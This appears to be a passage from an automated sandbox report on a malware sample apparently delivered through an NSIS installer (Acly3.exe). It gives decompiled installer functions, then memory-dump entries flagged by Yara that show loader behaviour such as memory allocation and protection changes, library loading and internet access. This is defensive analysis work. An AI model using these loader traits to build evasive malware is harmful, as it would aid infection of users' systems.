                                                                            						_t52 = 0x14;
                                                                            						asm("cdq");
                                                                            						_t24 = 1 / _t52 + _t53;
                                                                            					}
                                                                            					_t25 = _t24 & 0x00ffffff;
                                                                            					_t55 = _t24 >> 0;
                                                                            					_t46 = 0xa;
                                                                            					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                            				} else {
                                                                            					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                            					_t50 = 0;
                                                                            				}
                                                                            				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                            				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                                                                            				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                                                            				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                            				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                                                            			}



















                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                            • wsprintfW.USER32 ref: 00404DF0
                                                                            • SetDlgItemTextW.USER32 ref: 00404E03
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s
                                                                            • API String ID: 3540041739-3551169577
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E00405E0C(WCHAR* _a4) {
                                                                            				WCHAR* _t9;
                                                                            
                                                                            				_t9 = _a4;
                                                                            				_push( &(_t9[lstrlenW(_t9)]));
                                                                            				_push(_t9);
                                                                            				if( *(CharPrevW()) != 0x5c) {
                                                                            					lstrcatW(_t9, 0x40a014);
                                                                            				}
                                                                            				return _t9;
                                                                            			}




                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                            • CharPrevW.USER32(?,00000000), ref: 00405E1C
                                                                            • lstrcatW.KERNEL32 ref: 00405E2E
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-4017390910
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00403019(intOrPtr _a4) {
                                                                            				long _t2;
                                                                            				struct HWND__* _t3;
                                                                            				struct HWND__* _t6;
                                                                            
                                                                            				if(_a4 == 0) {
                                                                            					__eflags =  *0x42aa20; // 0x0
                                                                            					if(__eflags == 0) {
                                                                            						_t2 = GetTickCount();
                                                                            						__eflags = _t2 -  *0x434f0c;
                                                                            						if(_t2 >  *0x434f0c) {
                                                                            							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                                                                            							 *0x42aa20 = _t3;
                                                                            							return ShowWindow(_t3, 5);
                                                                            						}
                                                                            						return _t2;
                                                                            					} else {
                                                                            						return E00406946(0);
                                                                            					}
                                                                            				} else {
                                                                            					_t6 =  *0x42aa20; // 0x0
                                                                            					if(_t6 != 0) {
                                                                            						_t6 = DestroyWindow(_t6);
                                                                            					}
                                                                            					 *0x42aa20 = 0;
                                                                            					return _t6;
                                                                            				}
                                                                            			}






                                                                            APIs
                                                                            • DestroyWindow.USER32 ref: 0040302C
                                                                            • GetTickCount.KERNEL32(00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040304A
                                                                            • CreateDialogParamW.USER32 ref: 00403067
                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00403075
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                            • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                            • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                            • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 53%
                                                                            			E00405F14(void* __eflags, intOrPtr _a4) {
                                                                            				int _t11;
                                                                            				signed char* _t12;
                                                                            				intOrPtr _t18;
                                                                            				intOrPtr* _t21;
                                                                            				signed int _t23;
                                                                            
                                                                            				E0040653D(0x42fa70, _a4);
                                                                            				_t21 = E00405EB7(0x42fa70);
                                                                            				if(_t21 != 0) {
                                                                            					E004067C4(_t21);
                                                                            					if(( *0x434f18 & 0x00000080) == 0) {
                                                                            						L5:
                                                                            						_t23 = _t21 - 0x42fa70 >> 1;
                                                                            						while(1) {
                                                                            							_t11 = lstrlenW(0x42fa70);
                                                                            							_push(0x42fa70);
                                                                            							if(_t11 <= _t23) {
                                                                            								break;
                                                                            							}
                                                                            							_t12 = E00406873();
                                                                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                            								E00405E58(0x42fa70);
                                                                            								continue;
                                                                            							} else {
                                                                            								goto L1;
                                                                            							}
                                                                            						}
                                                                            						E00405E0C();
                                                                            						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                                            					}
                                                                            					_t18 =  *_t21;
                                                                            					if(_t18 == 0 || _t18 == 0x5c) {
                                                                            						goto L1;
                                                                            					} else {
                                                                            						goto L5;
                                                                            					}
                                                                            				}
                                                                            				L1:
                                                                            				return 0;
                                                                            			}









                                                                            APIs
                                                                              • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(?), ref: 00405EC5
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                            • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                            • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 3248276644-4017390910
                                                                            • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                            • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                            • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                            • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 89%
                                                                            			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                            				int _t15;
                                                                            				long _t16;
                                                                            
                                                                            				_t15 = _a8;
                                                                            				if(_t15 != 0x102) {
                                                                            					if(_t15 != 0x200) {
                                                                            						_t16 = _a16;
                                                                            						L7:
                                                                            						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                                                            							_push(_t16);
                                                                            							_push(6);
                                                                            							 *0x42d254 = _t16;
                                                                            							E00404ED4();
                                                                            						}
                                                                            						L11:
                                                                            						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                                                            					}
                                                                            					if(IsWindowVisible(_a4) == 0) {
                                                                            						L10:
                                                                            						_t16 = _a16;
                                                                            						goto L11;
                                                                            					}
                                                                            					_t16 = E00404E54(_a4, 1);
                                                                            					_t15 = 0x419;
                                                                            					goto L7;
                                                                            				}
                                                                            				if(_a12 != 0x20) {
                                                                            					goto L10;
                                                                            				}
                                                                            				E004044E5(0x413);
                                                                            				return 0;
                                                                            			}






                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00405542
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                              • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                            • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                            • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                            • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 90%
                                                                            			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                            				int _v8;
                                                                            				long _t21;
                                                                            				long _t24;
                                                                            				char* _t30;
                                                                            
                                                                            				asm("sbb eax, eax");
                                                                            				_v8 = 0x800;
                                                                            				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                            				_t30 = _a16;
                                                                            				if(_t21 != 0) {
                                                                            					L4:
                                                                            					 *_t30 =  *_t30 & 0x00000000;
                                                                            				} else {
                                                                            					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                            					_t21 = RegCloseKey(_a20);
                                                                            					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                            					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                            						goto L4;
                                                                            					}
                                                                            				}
                                                                            				return _t21;
                                                                            			}








                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 00406451
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0040645C
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\Acly3.exe, xrefs: 00406412
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                            • API String ID: 3356406503-569140738
                                                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                            • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                            • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00403B57() {
                                                                            				void* _t2;
                                                                            				void* _t3;
                                                                            				void* _t6;
                                                                            				void* _t8;
                                                                            
                                                                            				_t8 =  *0x42b22c;
                                                                            				_t3 = E00403B3C(_t2, 0);
                                                                            				if(_t8 != 0) {
                                                                            					do {
                                                                            						_t6 = _t8;
                                                                            						_t8 =  *_t8;
                                                                            						FreeLibrary( *(_t6 + 8));
                                                                            						_t3 = GlobalFree(_t6);
                                                                            					} while (_t8 != 0);
                                                                            				}
                                                                            				 *0x42b22c =  *0x42b22c & 0x00000000;
                                                                            				return _t3;
                                                                            			}

                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,74EDD4C4,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                            • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Free$GlobalLibrary
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 1100898210-4017390910
                                                                            • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                            • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                            • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                            • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                            				int _v8;
                                                                            				int _t12;
                                                                            				int _t14;
                                                                            				int _t15;
                                                                            				CHAR* _t17;
                                                                            				CHAR* _t27;
                                                                            
                                                                            				_t12 = lstrlenA(_a8);
                                                                            				_t27 = _a4;
                                                                            				_v8 = _t12;
                                                                            				while(lstrlenA(_t27) >= _v8) {
                                                                            					_t14 = _v8;
                                                                            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                            					_t15 = lstrcmpiA(_t27, _a8);
                                                                            					_t27[_v8] =  *(_t14 + _t27);
                                                                            					if(_t15 == 0) {
                                                                            						_t17 = _t27;
                                                                            					} else {
                                                                            						_t27 = CharNextA(_t27);
                                                                            						continue;
                                                                            					}
                                                                            					L5:
                                                                            					return _t17;
                                                                            				}
                                                                            				_t17 = 0;
                                                                            				goto L5;
                                                                            			}

                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
                                                                            • CharNextA.USER32(00000000), ref: 00405FCB
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                            • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                            • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                            • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Executed Functions

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.680044969.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.680033916.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000004.00000002.680091430.0000000000422000.00000004.00020000.sdmp
                                                                            • Associated: 00000004.00000002.680105357.0000000000423000.00000002.00020000.sdmp
                                                                            • Associated: 00000004.00000002.680224294.000000000184E000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: #100
                                                                            • String ID: VB5!6%*
                                                                            • API String ID: 1341478452-4246263594
                                                                            • Opcode ID: 240a76cf376abad16814bb0c64466c77f3da418e83fee7c55de29371a34508a9
                                                                            • Instruction ID: 431ee74642565b8c53f0595ec301911314ed8db7edf54d3cd12032d2623be713
                                                                            • Opcode Fuzzy Hash: 240a76cf376abad16814bb0c64466c77f3da418e83fee7c55de29371a34508a9
                                                                            • Instruction Fuzzy Hash: B972973115968A8FDB03EF74CAA5951FFB0FE2371032A1797C4958A0A3D324F52ACB56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.679995330.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a2d6d05f13a44fe72d054e8d98ab29c4ea298ebd2e4dafa3a480db3d72ee2ad8
                                                                            • Instruction ID: 9697a33b59dd060b65cd28a0130f9d74a05fd948a95892cec8e4681b56ff0712
                                                                            • Opcode Fuzzy Hash: a2d6d05f13a44fe72d054e8d98ab29c4ea298ebd2e4dafa3a480db3d72ee2ad8
                                                                            • Instruction Fuzzy Hash: C4F0C033492B868BEF26E53A1C44499FB97FE972F4755075CC1D00F8E783136006A741
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Executed Functions

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoadMemoryProtectVirtual
                                                                            • String ID: #~f#$&Ee$aC=e$d |f$n\\'
                                                                            • API String ID: 3389902171-2964783884
                                                                            • Opcode ID: 0f399eb9fb3f7b5005f5f664ac4065f5484067d7f749647f8be835907fb5f288
                                                                            • Instruction ID: 6585026d758669684b6d7b46ddc4adb5fdd8243f863623301bea95bbae9d97c2
                                                                            • Opcode Fuzzy Hash: 0f399eb9fb3f7b5005f5f664ac4065f5484067d7f749647f8be835907fb5f288
                                                                            • Instruction Fuzzy Hash: 6BD24671608386CFDF359E38C8947EA7FA2BF52360F55852EDC8A9B255D7308981DB02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InternetOpen
                                                                            • String ID: 6"8_
                                                                            • API String ID: 2038078732-595991153
                                                                            • Opcode ID: ddffb61e4a1c5ae8f61ebd3df64c67fc75e4b09394ac26bf222e3492de3d1e40
                                                                            • Instruction ID: 033ef3eeaa1be99a136ac63c39d595037c15cf3fc6b4cb801cb6d851718cf7bc
                                                                            • Opcode Fuzzy Hash: ddffb61e4a1c5ae8f61ebd3df64c67fc75e4b09394ac26bf222e3492de3d1e40
                                                                            • Instruction Fuzzy Hash: 76A12535504345CFCF349E68E9987EA3BA2BF99360F65861BCC1E8B255D7308A45BF02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00570275: LoadLibraryA.KERNEL32(?,?,?,005612B7,005614F7), ref: 0057057A
                                                                            • NtAllocateVirtualMemory.NTDLL(-30F81B36), ref: 0056C9E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateLibraryLoadMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2616484454-0
                                                                            • Opcode ID: 876ebc48a05155523ecbb6d5762ff70734fda8ddb98b5338c103e97091b26337
                                                                            • Instruction ID: 4439bc996f5ce0acfe1a3c57c1784216c7c0797c882ab2209bb78d58155ed856
                                                                            • Opcode Fuzzy Hash: 876ebc48a05155523ecbb6d5762ff70734fda8ddb98b5338c103e97091b26337
                                                                            • Instruction Fuzzy Hash: B95168312083498FDB749E6898A63FA3FA1FF85354F64091EDCCB9B260D73189469B02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL(D528630F,?,?,?,?,005724B4,B309C73A,005693C0), ref: 005736AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2706961497-0
                                                                            • Opcode ID: 00984d62abaf5fff93baf3f747d54b6fd1cd7affb2d458906b97e5cde6030c4b
                                                                            • Instruction ID: 8d2ab28ebef50daa3bf2ee47a0b8b93b3c594c15f0193ae5c91885a86dc004ec
                                                                            • Opcode Fuzzy Hash: 00984d62abaf5fff93baf3f747d54b6fd1cd7affb2d458906b97e5cde6030c4b
                                                                            • Instruction Fuzzy Hash: 3101F2719843869FCB28CE18D915AEFBBA6EFD5354F56803EBC4A9B320CB705E05D640
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CloseServiceHandle.ADVAPI32 ref: 005636D0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleService
                                                                            • String ID: [
                                                                            • API String ID: 1725840886-784033777
                                                                            • Opcode ID: 113fe4d99f4cd170e6ea5b9646355349d07aedab6da624c9248daf36ffcca2a6
                                                                            • Instruction ID: 62a83ff9e496782e1d1e970f5656148ea37733020031eb84e38833c3662cc1f4
                                                                            • Opcode Fuzzy Hash: 113fe4d99f4cd170e6ea5b9646355349d07aedab6da624c9248daf36ffcca2a6
                                                                            • Instruction Fuzzy Hash: 3A21CB7344A61ECFE71AAAA86C872D23FA09F1A630B641A9EC414DF8C3DB10C507D1C0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 10f3ac6953f4ff95882e3db882f1e8ba44d8322381f0e35b2fc0dacf2a564da1
                                                                            • Instruction ID: c841d31d04c81b6340e6e6f24d9385d9c07607fe25bbb85e80db758ca09a0195
                                                                            • Opcode Fuzzy Hash: 10f3ac6953f4ff95882e3db882f1e8ba44d8322381f0e35b2fc0dacf2a564da1
                                                                            • Instruction Fuzzy Hash: 77412A35608656DFCB248E28A8947FA2FE1BF95320F64D95EE84EC7285C6708941BB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,005612B7,005614F7), ref: 0057057A
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnumWindows
                                                                            • String ID:
                                                                            • API String ID: 1129996299-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%